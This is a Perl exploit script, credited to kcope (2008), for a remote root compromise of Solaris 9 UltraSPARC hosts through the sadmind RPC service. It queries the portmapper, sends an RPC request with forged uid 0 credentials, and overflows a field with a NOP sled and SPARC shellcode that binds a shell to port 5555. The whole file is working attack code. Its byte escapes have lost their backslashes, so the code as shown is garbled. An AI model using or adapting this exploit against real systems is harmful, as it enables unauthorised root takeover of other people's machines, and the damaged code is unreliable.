# Title : Solaris 9 [UltraSPARC] sadmind Remote Root Exploit
# Published : 2008-10-19
# Author : kcope
#!/usr/bin/perl
# holygrail2 #
#---------------------------------------------------------------------------------#
# SunOS 5.9 [UltraSPARC] sadmind Remote Root Exploit by KingCope in 2008 #
# #
# Most of the work was shamelessly ripped from HD-Moore and RISE-Security exploits!!! #
# Bug found by RISE-Security. #
# Sparc exploit by KingCope [kcope2@googlemail.com] #
# Maybe I will extend this to Solaris 8/10/11 in futura ?? #
# thanks to alex,andi,adize ... #
# #
###################################################################################
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
# Banner, then the single positional argument: the target address.
# NOTE(review): the trailing `n` characters in these strings look like newline
# escapes whose backslash was lost when the page was extracted; the literals
# are kept exactly as they appear here.
print "holygrail2 vs. SunOS 5.9 sadmindnby kcope in 2008nbinds a shell to port 5555n";
my $host = $ARGV[0];
unless (defined $host && length $host) {
    print "usage: perl holygrail2.pl <address>n";
    exit(-1);
}
# solaris_sparc_bind - LPORT=5555 Size=232 Encoder=Sparc http://metasploit.com
# NOTE(review): on this page the `\x` escape sequences of this payload (and of
# every other byte string in the file) appear with their backslashes stripped,
# so as written these are literal three-character "xNN" ASCII runs, not the
# 232 bytes the comment above describes.  The literals are reproduced unchanged.
my $payload =
"x23x32xdexd7xa2x14x62x6fx20xbfxffxffx20xbfxffxff".
"x7fxffxffxffxeax03xe0x20xaax9dx40x11xeax23xe0x20".
"xa2x04x40x15x81xdbxe0x20x12xbfxffxfbx9ex03xe0x04".
"x57x50xfex68xffxb6xdex77x69xadxdex7cx01xcbx1ex89".
"xbbxfcxbex8fx2bxecx9ex8dxcex1cxfex77x5fxccxdfx7f".
"x8fxcexa0x87x11x10xdfxf2xf1x04xfex4fx11x06xbex5f".
"x11x6bx7ex6bx03x4fx21x83xb7x80x01xb3x35xb0x61x5b".
"xa8x60x42x93x1bx83x3dx5bx09x94x62x9axafx84x42x75".
"x3ex74xa3x8dx91x77x1cx75x83x62x23x8cx37x80xe3x87".
"xb5xb4xc3x7dx28x65x24x89x9bxa6x9bx71x8fxb8xc4x82".
"x3dxa9x24x8dxd5x6bx84x8cx54x7bxe4xb0xc9xabxc4xc4".
"xf8xf3xfbx28x2dx0fxbbx28x59x15x04xc3x40x21x5cx49".
"x22x22x7cx03x01x41xa2x01xd5x75xfbxa5x47x5ax5bxcd".
"x87xa6x24x3dx97xfaxe4x45xd7xdexa4x49x5ax30xfbx8a".
"xcbxe0xdbxe4xecx01x1bxf4";
# Two big-endian packed 32-bit values.  $retaddr is repeated 100 times inside
# the buffer built by rpc_sadmin_expl(); $patchaddr is declared but never
# referenced anywhere in this file.
my $patchaddr = pack("N", 0xffbf83d8);
my $retaddr = pack("N", 0xffbf88e0);
# Switch a filehandle to non-blocking mode.  Returns whatever the F_SETFL
# fcntl() call returns; neither fcntl() result is checked, as in the original.
sub nonblock {
    my $handle = shift;
    my $current_flags = fcntl($handle, F_GETFL, 0);
    return fcntl($handle, F_SETFL, $current_flags | O_NONBLOCK);
}
# Wait up to 4 seconds for $sock to become readable, then return one
# line-read from it.  Returns undef when nothing arrived within the timeout.
sub rpc_read {
    my $sock = shift;
    my $collected;
    my $watcher = IO::Select->new($sock);
    for my $ready ($watcher->can_read(4)) {
        $collected .= readline($sock);
    }
    return $collected;
}
# Ask the portmapper at $target_host:$target_port (UDP) which port RPC program
# $prog, version $vers, is registered on.  Returns that port, or undef when the
# reply is not the expected 28-byte GETPORT response (or no reply arrived).
sub rpc_getport {
    my ($target_host, $target_port, $prog, $vers) = @_;
    my $sock = rpc_socket($target_host, $target_port);
    my @call = (
        pack("L", rand() * 0xffffffff),   # XID
        "x00x00x00x00",                   # Call
        "x00x00x00x02",                   # RPC Version
        "x00x01x86xa0",                   # Program Number (PORTMAP)
        "x00x00x00x02",                   # Program Version (2)
        "x00x00x00x03",                   # Procedure (getport)
        "x00" x 16,                       # Credentials and Verifier
        pack("N", $prog),
        pack("N", $vers),
        pack("N", 0x11),                  # Protocol: UDP
        pack("N", 0x00),                  # Port: 0
    );
    print {$sock} join('', @call);
    my $reply = rpc_read($sock);
    close($sock);
    # The port number sits in the last 4 bytes of a 28-byte reply.
    if (length($reply) == 28) {
        return unpack("N", substr($reply, 24, 4));
    }
    return undef;
}
# Open a UDP socket to $target_host:$target_port, make it and STDOUT
# unbuffered, put the socket into non-blocking mode and return it.
# On failure the error is printed and the program exits with status 0,
# exactly as the original does.
sub rpc_socket {
    my ($target_host, $target_port) = @_;
    my $sock = IO::Socket::INET->new(
        PeerAddr => $target_host,
        PeerPort => $target_port,
        Proto    => "udp",
        Type     => SOCK_DGRAM,
    );
    unless ($sock) {
        print "nError: could not create socket to target: $!n";
        exit(0);
    }
    $sock->autoflush(1);
    select(STDOUT);
    $| = 1;
    nonblock($sock);
    return $sock;
}
# Build the sadmind request that the main loop sends: an ONC RPC call header
# (program 0x18788 = 100232, version 10, procedure 1) with AUTH_UNIX
# credentials naming $hostname as the machine name and uid 0 / gid 0, then a
# sadmind message header and a body of length-prefixed ADM_* tagged fields.
# The ADM_METHOD field carries $buf1 — 50 filler bytes when $first eq 1,
# otherwise the oversized buffer assembled from $payload, $fp and $retaddr —
# and $command is zero-padded to 512 bytes near the end of the body.
# Returns the complete request as a single byte string.
# NOTE(review): as elsewhere on this page the `\x` escapes below appear with
# their backslashes stripped; the literals are left exactly as shown.
sub rpc_sadmin_expl {
my ($hostname, $command, $first) = @_;
# $hostname padded with "x00" to 59 characters; used twice in the body.
my $packed_host = $hostname . ("x00" x (59 - length($hostname)));
my $rpc =
pack("L", rand() * 0xffffffff) . # XID
"x00x00x00x00". # Call
"x00x00x00x02". # RPC Version
"x00x01x87x88". # Program Number (SADMIND)
"x00x00x00x0a". # Program Version (10)
"x00x00x00x01". # Procedure
"x00x00x00x01"; # Credentials (UNIX)
# Auth Length is filled in
# pad it up to multiples of 4
my $rpc_hostname = $hostname;
while (length($rpc_hostname) % 4 != 0) { $rpc_hostname .= "x00" }
my $rpc_auth =
# Time Stamp
pack("N", time() + 20001) .
# Machine Name
pack("N", length($hostname)) . $rpc_hostname .
"x00x00x00x00". # UID = 0
"x00x00x00x00". # GID = 0
"x00x00x00x00"; # No Extra Groups
# Credential length + body, followed by 8 zero bytes (the verifier).
$rpc .= pack("N", length($rpc_auth)) . $rpc_auth . ("x00" x 8);
# $fp is another packed 32-bit value; $buf1 is the ADM_METHOD value
# (see the note at the top of this sub).  `x` binds tighter than `.`,
# so each repetition applies only to the string immediately before it.
my $fp = pack("N", 0xffbf9108);
my $buf1 = "x90" x (2050-length($payload)-500) . $payload . "x90x90" . "x90" x 500 . "CC" . $fp . $fp . $retaddr x 100;
# First pass of the caller's two-iteration loop: a short filler only.
# ($first is the loop counter, compared as a string.)
if ($first eq 1) {
$buf1 = "x90" x 50;
}
while (length($buf1) % 4 != 0) { $buf1 .= "x00" }
my $header =
# Another Time Stamp
reverse(pack("L", time() + 20005)) .
"x00x07x45xdf".
"x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x06".
"x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x04x00x00x00x00x00x00x00x04".
"x7fx00x00x01". # 127.0.0.1
"x00x01x87x88". # SADMIND
"x00x00x00x0ax00x00x00x04".
"x7fx00x00x01". # 127.0.0.1
"x00x01x87x88". # SADMIND
"x00x00x00x0ax00x00x00x11x00x00x00x1e".
"x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00".
"x00x00x00x3b". $packed_host.
"x00x00x00x00x06" . "system".
"x00x00x00x00x00x15". "../../../../../bin/sh". "x00x00x00";
# Append Body Length ^-- Here
# Body: each field is a length-prefixed ADM_* name followed by type/length
# words and the value.  The magic words between fields are not explained in
# this file and are reproduced as given.
my $body =
"x00x00x00x0e". "ADM_FW_VERSION".
"x00x00x00x00x00x03x00x00x00x04x00x00".
"x00x01x00x00x00x00x00x00x00x00".
"x00x00x00x08". "ADM_LANG".
"x00x00x00x09x00x00x00x02x00x00".
"x00x01". "C" .
"x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x0d". "ADM_REQUESTID".
"x00x00x00x00x00x00x09x00x00x00x12x00x00x00x11".
"00009:000000000:0"."x00x00x00".
"x00x00x00x00x00x00x00x00".
"x00x00x00x09". "ADM_CLASS".
"x00x00x00x00x00x00x09x00x00x00x07".
"x00x00x00x06" . "system" .
"x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x0e" . "ADM_CLASS_VERS" .
"x00x00x00x00x00x09x00x00x00x04".
"x00x00x00x03". "2.1".
"x00x00x00x00x00x00x00x00x00".
"x00x00x00x0a" . "ADM_METHOD" .
"x00x00x00x00x00x09" . pack("N", length($buf1)+1) . pack("N", length($buf1)) . $buf1 .
"x00x00x00x00x00x00x00x00".
"x00x00x00x08". "ADM_HOST" .
"x00x00x00x09x00x00x00x3cx00x00x00x3b".
$packed_host.
"x00x00x00x00x00x00x00x00x00".
"x00x00x00x0f". "ADM_CLIENT_HOST".
"x00x00x00x00x09".
pack("N", length($hostname) + 1) .
pack("N", length($hostname)) .
$rpc_hostname .
"x00x00x00x00". "x00x00x00x00".
"x00x00x00x11" . "ADM_CLIENT_DOMAIN".
"x00x00x00x00x00x00x09x00x00x00x01x00x00x00x00x00x00".
"x00x00x00x00x00x00".
"x00x00x00x11" . "ADM_TIMEOUT_PARMS".
"x00x00x00x00x00".
"x00x09x00x00x00x1c".
"x00x00x00x1b" . "TTL=0 PTO=20 PCNT=2 PDLY=30".
"x00x00x00x00x00x00x00x00x00".
"x00x00x00x09" . "ADM_FENCE" .
"x00x00x00x00x00x00x09x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x01x58x00x00x00x00x00x00x09x00".
"x00x00x03x00x00x00x02" . "-c" .
"x00x00x00x00x00x00x00x00x00x00x00x00x00x01x59x00".
"x00x00x00x00x00x09x00x00x02x01x00x00x02x00".
$command . ("x00" x (512 - length($command))).
"x00x00x00x00x00x00x00x00x00x00x00x10".
"netmgt_endofargs";
# RPC call, header, a length word, then the body.
# NOTE(review): the -330 adjustment of the length word is not explained in
# this file; presumably it discounts header fields counted elsewhere — unverified.
my $res = $rpc . $header . pack("N", (length($body) + 4 + length($header)) - 330) . $body;
return($res);
}
# Driver: look up the sadmind port through the portmapper, then send the
# request built by rpc_sadmin_expl() twice — the first pass with $first = 1.
# Exits with status 0 (as the original does) when the port lookup fails.
$| = 1;
my $portmap = "111";
for my $attempt (1 .. 2) {
    my $target_port = rpc_getport($host, $portmap, 100232, 10);
    unless ($target_port) {
        print STDERR "Error: could not determine port used by sadmindn";
        exit(0);
    }
    my $sock = rpc_socket($host, $target_port);
    my $request = rpc_sadmin_expl("localhost", "foo", $attempt);
    print {$sock} $request;
    # The reply is awaited (up to 4 seconds) but not otherwise used.
    my $reply = rpc_read($sock);
    close($sock);
}